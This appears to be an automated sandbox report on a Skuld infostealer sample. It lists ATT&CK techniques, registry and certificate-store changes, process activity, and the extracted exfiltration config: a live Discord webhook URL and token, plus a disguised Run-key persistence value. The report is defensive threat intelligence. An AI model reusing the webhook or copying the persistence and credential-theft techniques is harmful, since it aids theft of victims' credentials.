skuld | hxxps://f[.]sed[.]lol/files/foqrs[.]exe

Analysis

max time kernel
25s
max time network
24s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20-08-2024 22:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://f.sed.lol/files/foqrs.exe

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1275570777562943619/CfD-pRhASNI97yrXg8BssfRJRJrGeagBhz72dQfdjXc70hZ50lirmSwHec53Jx0RZ28B

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4644	powershell.exe
4828	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 4 IoCs

pid	Process
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
3936	44f14b31-554a-300b-655e-fb6972dcc7bb.exe
5264	070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
5500	99cf3c46-b3c1-1eb4-0272-271a134746d5.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
68	discord.com
70	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
60	api.ipify.org
61	api.ipify.org
62	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5376	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3428	wmic.exe
1612	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	63	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
4828	powershell.exe
4828	powershell.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
4828	powershell.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
4644	powershell.exe
4644	powershell.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
4644	powershell.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
Token: SeIncreaseQuotaPrivilege	1892	wmic.exe
Token: SeSecurityPrivilege	1892	wmic.exe
Token: SeTakeOwnershipPrivilege	1892	wmic.exe
Token: SeLoadDriverPrivilege	1892	wmic.exe
Token: SeSystemProfilePrivilege	1892	wmic.exe
Token: SeSystemtimePrivilege	1892	wmic.exe
Token: SeProfSingleProcessPrivilege	1892	wmic.exe
Token: SeIncBasePriorityPrivilege	1892	wmic.exe
Token: SeCreatePagefilePrivilege	1892	wmic.exe
Token: SeBackupPrivilege	1892	wmic.exe
Token: SeRestorePrivilege	1892	wmic.exe
Token: SeShutdownPrivilege	1892	wmic.exe
Token: SeDebugPrivilege	1892	wmic.exe
Token: SeSystemEnvironmentPrivilege	1892	wmic.exe
Token: SeRemoteShutdownPrivilege	1892	wmic.exe
Token: SeUndockPrivilege	1892	wmic.exe
Token: SeManageVolumePrivilege	1892	wmic.exe
Token: 33	1892	wmic.exe
Token: 34	1892	wmic.exe
Token: 35	1892	wmic.exe
Token: 36	1892	wmic.exe
Token: SeIncreaseQuotaPrivilege	1892	wmic.exe
Token: SeSecurityPrivilege	1892	wmic.exe
Token: SeTakeOwnershipPrivilege	1892	wmic.exe
Token: SeLoadDriverPrivilege	1892	wmic.exe
Token: SeSystemProfilePrivilege	1892	wmic.exe
Token: SeSystemtimePrivilege	1892	wmic.exe
Token: SeProfSingleProcessPrivilege	1892	wmic.exe
Token: SeIncBasePriorityPrivilege	1892	wmic.exe
Token: SeCreatePagefilePrivilege	1892	wmic.exe
Token: SeBackupPrivilege	1892	wmic.exe
Token: SeRestorePrivilege	1892	wmic.exe
Token: SeShutdownPrivilege	1892	wmic.exe
Token: SeDebugPrivilege	1892	wmic.exe
Token: SeSystemEnvironmentPrivilege	1892	wmic.exe
Token: SeRemoteShutdownPrivilege	1892	wmic.exe
Token: SeUndockPrivilege	1892	wmic.exe
Token: SeManageVolumePrivilege	1892	wmic.exe
Token: 33	1892	wmic.exe
Token: 34	1892	wmic.exe
Token: 35	1892	wmic.exe
Token: 36	1892	wmic.exe
Token: SeIncreaseQuotaPrivilege	1612	wmic.exe
Token: SeSecurityPrivilege	1612	wmic.exe
Token: SeTakeOwnershipPrivilege	1612	wmic.exe
Token: SeLoadDriverPrivilege	1612	wmic.exe
Token: SeSystemProfilePrivilege	1612	wmic.exe
Token: SeSystemtimePrivilege	1612	wmic.exe
Token: SeProfSingleProcessPrivilege	1612	wmic.exe
Token: SeIncBasePriorityPrivilege	1612	wmic.exe
Token: SeCreatePagefilePrivilege	1612	wmic.exe
Token: SeBackupPrivilege	1612	wmic.exe
Token: SeRestorePrivilege	1612	wmic.exe
Token: SeShutdownPrivilege	1612	wmic.exe
Token: SeDebugPrivilege	1612	wmic.exe
Token: SeSystemEnvironmentPrivilege	1612	wmic.exe
Token: SeRemoteShutdownPrivilege	1612	wmic.exe
Token: SeUndockPrivilege	1612	wmic.exe
Token: SeManageVolumePrivilege	1612	wmic.exe
Token: 33	1612	wmic.exe
Token: 34	1612	wmic.exe
Token: 35	1612	wmic.exe
Token: 36	1612	wmic.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 340 wrote to memory of 4848	340	foqrs.exe	110
PID 340 wrote to memory of 4848	340	foqrs.exe	110
PID 4848 wrote to memory of 432	4848	cmd.exe	111
PID 4848 wrote to memory of 432	4848	cmd.exe	111
PID 432 wrote to memory of 1756	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	112
PID 432 wrote to memory of 1756	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	112
PID 432 wrote to memory of 4064	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	113
PID 432 wrote to memory of 4064	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	113
PID 432 wrote to memory of 1892	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	116
PID 432 wrote to memory of 1892	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	116
PID 432 wrote to memory of 1612	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	117
PID 432 wrote to memory of 1612	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	117
PID 432 wrote to memory of 3884	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	120
PID 432 wrote to memory of 3884	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	120
PID 432 wrote to memory of 4828	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	121
PID 432 wrote to memory of 4828	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	121
PID 3644 wrote to memory of 4644	3644	foqrs.exe	125
PID 3644 wrote to memory of 4644	3644	foqrs.exe	125
PID 4644 wrote to memory of 3936	4644	cmd.exe	123
PID 4644 wrote to memory of 3936	4644	cmd.exe	123
PID 432 wrote to memory of 1892	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	124
PID 432 wrote to memory of 1892	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	124
PID 432 wrote to memory of 4644	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	125
PID 432 wrote to memory of 4644	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	125
PID 432 wrote to memory of 3428	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	126
PID 432 wrote to memory of 3428	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	126
PID 432 wrote to memory of 5188	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	131
PID 432 wrote to memory of 5188	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	131
PID 2456 wrote to memory of 5204	2456	foqrs.exe	132
PID 2456 wrote to memory of 5204	2456	foqrs.exe	132
PID 432 wrote to memory of 5328	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	134
PID 432 wrote to memory of 5328	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	134
PID 432 wrote to memory of 5356	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	135
